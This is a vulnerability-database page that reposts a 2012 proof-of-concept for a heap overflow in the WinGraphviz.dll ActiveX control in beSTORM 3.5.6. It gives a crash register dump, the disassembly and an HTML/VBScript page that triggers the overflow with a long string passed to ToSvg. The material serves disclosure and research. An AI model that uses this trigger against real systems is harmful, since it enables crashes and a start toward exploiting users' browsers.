Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WinGraphviz Heap Overflow

🗓️ 15 Jul 2012 00:00:00Reported by coolkavehType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

WinGraphviz Heap Overflow Exploit on beSTORM ActiveX (WinGraphviz.dll) Remot

Code
`Exploit Title: beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC  
Date: July 15, 2012  
Author: coolkaveh  
[email protected]  
Https://twitter.com/coolkaveh  
Vendor Homepage: http://www.beyondsecurity.com/  
Version: 3.5.6  
Tested on: windows 7 SP1  
Exploiting the Exploiters  
What kind of crappy fuzzer is that ?   
==========================================================================  
Registers:  
--------------------------------------------------------------------------  
EIP 01637FFB  
EAX 41414141  
EBX 01630000 -> 00905A4D -> Asc: MZMZ  
ECX 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EDX 41414141  
EDI 00000000  
ESI 00000000  
EBP 0013FD24 -> 0013FD34  
ESP 0013FD10 -> 0013FD34  
  
  
Block Disassembly:   
--------------------------------------------------------------------------  
1637FE9 CMP DWORD PTR [EAX+10],0  
1637FED JE SHORT 01638042  
1637FEF MOV ECX,[EBP+8]  
1637FF2 MOV EDX,[ECX+10]  
1637FF5 MOV [EBP-4],EDX  
1637FF8 MOV EAX,[EBP-4]  
1637FFB CMP DWORD PTR [EAX],0 <--- CRASH  
1637FFE JE SHORT 01638042  
1638000 MOV ECX,[EBP-4]  
1638003 CMP DWORD PTR [ECX+10],0  
1638007 JE SHORT 0163801B  
1638009 MOV EDX,[EBP-4]  
163800C MOV EAX,[EDX+10]  
163800F MOV ECX,[EBP-4]  
1638012 MOV EDX,[ECX+10]  
  
  
ArgDump:  
----------------------------------------------------------------------------  
EBP+8 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+12 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
  
============================================================================  
<html>  
Test Exploit page  
<object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C' id='fuzzer' ></object>  
<script language='vbscript'>  
  
arg1=String(2068, "A")  
  
fuzzer.ToSvg arg1   
  
</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Jul 2012 00:00Current
0.9Low risk
Vulners AI Score0.9
heap overflowexploitbestorm activexwingraphviz.dllremotevendorwindows 7testpageobjectscript
19